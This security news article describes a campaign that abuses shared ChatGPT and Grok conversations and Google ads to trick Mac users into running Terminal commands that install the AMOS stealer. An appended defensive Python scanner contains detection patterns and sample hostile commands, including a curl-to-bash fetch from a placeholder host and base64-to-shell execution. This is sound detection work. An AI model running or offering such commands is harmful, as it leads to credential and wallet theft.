Threat Actors Weaponize ChatGPT, Grok & Google Ads to Spread AMOS


By Marcus Rodriguez, February 11, 2026

Cybercriminals have launched a sophisticated campaign that exploits user trust in artificial intelligence (AI) platforms to distribute the Atomic macOS Stealer (AMOS). The tactics mark a dangerous evolution in social engineering.

This new threat combines legitimate AI chatbot services from ChatGPT and Grok with paid Google advertising to lure unsuspecting Mac users into executing malicious terminal commands that compromise their systems.

The campaign specifically targets individuals searching for common troubleshooting solutions, such as clearing disk space on macOS, redirecting them to seemingly authentic AI-generated instructions hosted on trusted domains.

The attack method leverages a technique known as “ClickFix,” where users are tricked into manually running shell commands that download and install malware directly onto their devices.

What makes this campaign particularly effective is its ability to bypass traditional security measures by appearing completely legitimate, as the malicious instructions are hosted on official ChatGPT and Grok websites rather than suspicious third-party domains.

Once executed, the AMOS stealer immediately begins harvesting sensitive information including browser passwords, cryptocurrency wallet seed phrases, Keychain credentials, and personal files, transmitting everything to attacker-controlled servers.

Flare analysts identified that attackers create shareable AI chat links containing step-by-step “installation guides” disguised as legitimate macOS troubleshooting instructions.

These conversations are then promoted to the top of Google search results through paid advertising campaigns, ensuring maximum visibility when users search for common technical queries.

The social engineering component proves remarkably effective because users inherently trust content hosted on reputable domains such as those of OpenAI and X.AI, and the credibility is boosted further when the link appears as a sponsored Google search result.

Attack Mechanism and Infection Chain

The infection process begins when a Mac user conducts a routine Google search for troubleshooting assistance, such as “clear disk space on macOS” or similar technical queries.

Sponsored advertisements or highly ranked organic results direct victims to shared ChatGPT or Grok conversations that appear to offer helpful system maintenance guidance.

These AI-generated conversations contain carefully crafted instructions that prompt users to open their Terminal application and paste what appears to be a harmless command.

The malicious command downloads a script from an external domain controlled by the attackers, which then repeatedly requests the user’s system password under the guise of legitimate system operations.

Once the correct credentials are provided, the script installs the AMOS infostealer along with a persistent backdoor that survives system reboots and provides long-term remote access to the compromised machine.

The malware immediately targets cryptocurrency wallets including Electrum, Exodus, Coinbase, MetaMask, and Ledger Live, extracting seed phrases and private keys that enable immediate theft of digital assets.

Additionally, AMOS harvests browser data from Chrome, Safari, and Firefox, including saved passwords, cookies, autofill information, and active login sessions.

Organizations and individual Mac users should monitor for unsigned applications requesting system passwords, unusual Terminal activity, and unexpected network connections to unfamiliar domains.

Security teams must educate users that instructions appearing on trusted AI platforms can be compromised through social engineering, and any guidance requesting Terminal command execution should be independently verified through official support channels before implementation.
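The "unusual Terminal activity" the previous paragraphs recommend watching for has a recognizable shape: a one-liner that pulls a script from a remote host and pipes it straight into a shell, a base64 blob decoded into a shell, or a LaunchAgent plist dropped for persistence. The following script is an added example written for this article, not code from the article, Flare, or the AMOS analysis; it scans zsh history lines (a constructed sample is embedded) for those shapes. The regexes and the sample commands are assumptions of the example, not indicators published by the article.

```python
"""Flag ClickFix-style commands in macOS shell history (added example)."""
import re
from dataclasses import dataclass

# Heuristic patterns for commands a user is typically coaxed into pasting.
# These are illustrative assumptions, not published IoCs for this campaign.
SUSPICIOUS_PATTERNS = {
    # curl/wget output piped directly into sh/bash/zsh (optionally via sudo)
    "remote_script_piped_to_shell": re.compile(
        r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    # base64-decoded payload executed by a shell
    "base64_decoded_execution": re.compile(
        r"base64\s+(-d|--decode)[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    # a plist written under LaunchAgents/LaunchDaemons (reboot persistence)
    "launch_agent_persistence": re.compile(
        r"Library/Launch(Agents|Daemons)/.*\.plist"),
}


@dataclass
class Finding:
    line_no: int   # 1-based position in the history input
    rule: str      # which heuristic matched
    command: str   # the command text with zsh metadata stripped


def strip_zsh_timestamp(line: str) -> str:
    """zsh EXTENDED_HISTORY stores ': <epoch>:<duration>;<command>'; return <command>."""
    m = re.match(r"^: \d+:\d+;(.*)$", line)
    return m.group(1) if m else line


def scan_history(lines):
    """Return a Finding for every (line, rule) pair that matches a heuristic."""
    findings = []
    for n, raw in enumerate(lines, 1):
        cmd = strip_zsh_timestamp(raw.rstrip("\n"))
        for rule, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(cmd):
                findings.append(Finding(n, rule, cmd))
    return findings


# Constructed sample history: two benign entries, then three ClickFix-like ones.
# example.invalid is a reserved, non-resolving placeholder domain.
SAMPLE_HISTORY = [
    ": 1707600000:0;df -h",
    ": 1707600010:0;cat /var/log/install.log | grep -i error",
    ": 1707600020:0;curl -fsSL https://example.invalid/clean-disk.sh | bash",
    ": 1707600030:0;echo ZWNobyBoaQ== | base64 -d | sh",
    ": 1707600040:0;cp /tmp/com.update.helper.plist ~/Library/LaunchAgents/com.update.helper.plist",
]

if __name__ == "__main__":
    # Run against the embedded sample; swap in open("~/.zsh_history") lines for a real host.
    for f in scan_history(SAMPLE_HISTORY):
        print(f"line {f.line_no}: {f.rule}: {f.command}")
```

Run on a real machine, the `curl ... | bash` rule alone will produce occasional benign hits (homebrew-style installers), so treat the output as triage input to correlate with the other two signals the article names: unsigned processes prompting for the account password and new outbound connections to unfamiliar domains around the same timestamp.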

Marcus is a security researcher and investigative journalist with expertise in vulnerability research, bug bounties, and cloud security. Since 2017, Marcus has been breaking stories on critical vulnerabilities affecting major platforms. His investigative work has led to the disclosure of numerous security flaws and improved defenses across the industry. Marcus is an active participant in bug bounty programs and has been recognized for responsible disclosure practices. He holds multiple security certifications and regularly speaks at industry events.